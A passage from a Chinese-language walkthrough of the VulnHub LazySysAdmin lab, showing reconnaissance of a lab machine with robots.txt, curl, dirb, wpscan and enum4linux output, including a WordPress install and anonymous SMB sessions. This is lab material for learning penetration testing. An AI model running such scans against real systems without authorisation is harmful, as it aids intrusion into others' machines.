84px;"></div></div></div></pre><p>在工具掃描的同時,手工探測漏洞利用點。訪問目標web服務,未發現什么,查看是否存在robots.txt發現4個目錄,並且存在目錄遍歷漏洞,但是並沒用獲取到可以利用的信息。</p><p><a href='http://192.168.0.100/robots.txt' target='_blank' class='url'>http://192.168.0.100/robots.txt</a></p><pre class="md-fences md-end-block" lang="http"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-error">User-agent: *</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /old/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /test/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /TR2/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /Backnode_files/</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 123px;"></div><div class="CodeMirror-gutters" style="display: none; height: 153px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/1.png' alt='1' referrerPolicy='no-referrer' /></p><p>使用curl獲取目標web的banner信息,發現使用的中間件是apache2.4.7,目標系統為Ubuntu。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 <span class="cm-builtin">curl</span> <span class="cm-attribute">-I</span> <span class="cm-number">192</span>.168.0.100</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HTTP/1.1 <span class="cm-number">200</span> OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Date: Wed, <span class="cm-number">31</span> Jan <span class="cm-number">2018</span> <span class="cm-number">13</span>:01:20 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Server: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Last-Modified: Sun, <span class="cm-number">06</span> Aug <span class="cm-number">2017</span> <span class="cm-number">05</span>:02:15 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">ETag: <span class="cm-string">"8ce8-5560ea23d23c0"</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Accept-Ranges: bytes</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Length: <span class="cm-number">36072</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Vary: Accept-Encoding</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Type: text/html</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 261px;"></div><div class="CodeMirror-gutters" style="display: none; height: 291px;"></div></div></div></pre><p>再來查看dirb掃描結果,發現目標文章用的是wordpress,且還有phpmyadmin。</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  dirb222 <span class="cm-builtin">cat</span> /home/evilk0/Desktop/result.txt | <span class="cm-builtin">grep</span> <span class="cm-string">"^+"</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/index.html (CODE:200|SIZE:36072)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/info.php (CODE:200|SIZE:77257)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/robots.txt (CODE:200|SIZE:92)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/server-status (CODE:403|SIZE:293)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 560px;"></div><div class="CodeMirror-gutters" style="display: none; height: 590px;"></div></div></div></pre><p>wpscan掃描結果</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# wpscan http://192.168.0.100/wordpress</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        __          _______   _____                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        \ \        / /  __ \ / ____|                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           \  /\  /  | |     ____) | (__| (_| | | | |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">            \/  \/   |_|    |_____/ \___|\__,_|_| |_|</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        WordPress Security Scanner by the WPScan Team </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                       Version 2.9.3</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          Sponsored by Sucuri - https://sucuri.net</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] URL: http://192.168.0.100/wordpress/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Started: Thu Feb  1 01:37:20 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress theme in use: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Name: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Last updated: 2017-11-16T00:00:00.000Z</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The version is out of date, the latest version is 1.9</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme Name: Twenty Fifteen</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme URI: https://wordpress.org/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author: the WordPress team</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author URI: https://wordpress.org/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating plugins from passive detection ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] No plugins found</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Thu Feb  1 01:37:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Requests Done: 356</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 37.98 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:04</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 1273px;"></div><div class="CodeMirror-gutters" style="display: none; height: 1303px;"></div></div></div></pre><p> </p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/6.png' alt='6' referrerPolicy='no-referrer' /></p><p>enum4linux 192.168.0.100</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:08 <span class="cm-number">2018</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Target Information    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Target ........... <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">RID Range ........ <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Username ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Enumerating Workgroup/Domain on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got domain/workgroup name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Nbtstat Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Looking up status of <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>LAZYSYSADMIN    <00> <span class="cm-attribute">-</span>         B <ACTIVE>  Workstation Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>LAZYSYSADMIN    <03> <span class="cm-attribute">-</span>         B <ACTIVE>  Messenger Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>LAZYSYSADMIN    <20> <span class="cm-attribute">-</span>         B <ACTIVE>  File Server Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>WORKGROUP       <00> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Domain/Workgroup Name</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>WORKGROUP       <1e> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Browser Service Elections</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>MAC Address <span class="cm-operator">=</span> <span class="cm-number">00</span><span class="cm-attribute">-00-00-00-00-00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Session Check on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Server <span class="cm-number">192</span>.168.0.100 allows sessions using username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting domain SID <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Sid: (NULL SID)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Can<span class="cm-string">'t determine if host is part of domain or part of a workgroup</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    OS information on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from smbclient: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from srvinfo:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>platform_id     :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">500</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>os version      :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">6</span>.1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>server type     :<span class="cm-tab" role="presentation" cm-text="  ">   </span>0x809a03</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " 